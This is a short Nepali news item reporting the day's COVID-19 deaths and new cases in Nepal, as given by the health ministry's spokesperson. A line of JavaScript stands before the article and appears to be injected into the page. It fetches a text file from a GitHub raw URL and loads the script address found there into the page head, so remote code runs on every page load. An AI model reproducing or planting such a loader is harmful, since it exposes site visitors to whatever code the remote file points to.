;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ ०३
काठमाडौं । कोरोना भाइरस संक्रमणबाट पछिल्लो २४ घण्टामा नेपालमा थप ६ जनाको मृत्यु भएको छ । योसहित नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या १२० पुगेको स्वास्थ्य तथा जनसंख्या मन्त्रालयले जनाएको छ ।
यही २४ घण्टाकै बीचमा थप ६८१ जना नयाँ संक्रमित पनि फेला परेको स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वर गौतमले जानकारी दिए । कुल संक्रमित भने २८,९३८ पुग्दा सक्रिय संक्रमित भने ११ हजार १ सय १८ जना मात्र रहेको मन्त्रालयको भनाइ छ ।file Photo
फेसबुक प्रतिक्रियाहरु